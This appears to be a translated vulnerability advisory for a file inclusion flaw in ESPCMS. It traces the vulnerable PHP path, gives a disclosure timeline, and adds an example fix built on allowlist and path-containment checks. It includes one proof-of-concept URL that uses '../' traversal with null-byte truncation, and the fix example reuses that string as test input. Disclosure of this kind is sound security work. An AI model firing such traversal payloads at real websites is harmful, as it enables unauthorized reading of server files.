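2013-04-08: Details reported to the vendor; awaiting vendor handling
2013-04-08: Vendor confirmed; details disclosed to the vendor only
2013-04-18: Details disclosed to core white hats and experts in related fields
2013-04-23: Vendor disclosed the vulnerability early; details disclosed to the public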
File inclusion
adminsoft/index.php
$archive = indexget('archive', 'R');
$archive = empty($archive) ? 'adminuser' : $archive;
$action = indexget('action', 'R');
$action = empty($action) ? 'login' : $action;
include admin_ROOT . adminfile . "/control/$archive.php"; // the inclusion arises here, good nice
$control = new important();
$action = 'on' . $action;
if (method_exists($control, $action)) {
    $control->$action();
} else {
    exit('错误:系统方法错误!');
}
First, look at index.php

/// irrelevant code omitted
$archive = indexget('ac', 'R'); //ac
$action = indexget('at', 'R'); //at
/// irrelevant code omitted
if (empty($archive) || empty($action)) {
    include admin_ROOT . 'interface/public.php';
    $mainlist = new mainpage();
    if (method_exists($mainlist, 'in_index')) {
        $mainlist->in_index();
    } else {
        exit('Access error!');
    }
} else {
    if (in_array($archive, array('article', 'forum', 'search', 'bbssearch', 'forummain', 'messmain', 'special', 'respond', 'public', 'scriptout', 'enquiry', 'enquirymain', 'form', 'formmain', 'ordermain', 'membermain', 'member', 'forum', 'order'))) { // enforced; the front-page include is gone now
        $action = 'in_' . $action; // in_$ function
        if (!file_exists(admin_ROOT . "interface/$archive.php")) { // follow this
            exit('Access error!');
        }
        include admin_ROOT . "interface/$archive.php";
        $mainlist = new mainpage();
        if (method_exists($mainlist, $action)) {
            $mainlist->$action();
        } else {
            exit('Access error!');
        }
    } else {
        exit('Access error!');
    }
}
/// irrelevant code omitted

Follow into the interface/enquity file

/// irrelevant code omitted
$filename = $this->fun->accept('filename', 'G'); // the filename variable
$filename = empty($filename) ? 'list' : $filename;
/// irrelevant code omitted
$output = $this->pagetemplate->fetch($lng . '/lib/' . $filename);
/// irrelevant code omitted
/// follow into the function library to take a look
function fetch($tpl_file, $cache_fileID = null, $outHTML = null) {
    if (!empty($outHTML)) {
        $out = $this->gettemprequire($outHTML);
        return $out;
    }
    require_once 'ectemplates_parser.php';

    if ($this->libfile) {
        $tpl_file = $this->templatesDIR . $tpl_file . '.html'; //html
    }

    $template_file = $this->tpl_dir . $tpl_file;

    $parsed_file = $this->tpl_c_dir . md5($tpl_file) . '.php';

http://127.0.0.1/espcms_utf8_5.6.13.03.14_b/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00
Filter special characters
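
One way to apply this fix to the filename parameter, shown as an added example that is neither ESPCMS code nor the vendor's actual patch. The function name resolve_template and the directory layout are assumptions, and the example goes slightly beyond character filtering by also checking that the resolved path stays inside the template directory.

```php
<?php
// Added example, not ESPCMS code: resolve_template() and the paths used below
// are hypothetical names chosen for illustration.

/**
 * Map a user-supplied template name to a file inside $libDir.
 * Returns the absolute path, or null if the name must be rejected.
 */
function resolve_template(string $libDir, string $name): ?string
{
    // 1. Allowlist: letters, digits, underscore, hyphen only. This rejects
    //    '/', '\', '.', and NUL bytes in one step, so neither "../" traversal
    //    nor "%00" truncation of the '.html' suffix can get through.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    // 2. Containment: resolve symlinks and confirm the result is still
    //    located under the template directory.
    $base = realpath($libDir);
    $path = realpath($libDir . DIRECTORY_SEPARATOR . $name . '.html');
    if ($base === false || $path === false) {
        return null; // directory or template does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the template directory
    }
    return $path;
}

// Constructed sample input: a temporary template directory with one template.
$lib = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
@mkdir($lib);
file_put_contents($lib . DIRECTORY_SEPARATOR . 'list.html', '<p>list</p>');

$samples = ['list', '../../../../index.txt' . "\0", '..\\..\\index', 'missing', ''];
foreach ($samples as $candidate) {
    $resolved = resolve_template($lib, $candidate);
    printf("%-28s => %s\n", json_encode($candidate), $resolved ?? 'REJECTED');
}

unlink($lib . DIRECTORY_SEPARATOR . 'list.html');
rmdir($lib);
```

Only the first sample resolves to a path; the traversal string, the backslash variant, the missing template and the empty name are all rejected before any include or fetch call would see them.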
Severity: High
Vulnerability Rank: 15
Confirmed at: 2013-04-08 18:42
Thank you, we will fix this as soon as possible!!!
2013-04-23: This vulnerability has been fixed! Download at http://www.ecisp.cn/html/cn/download/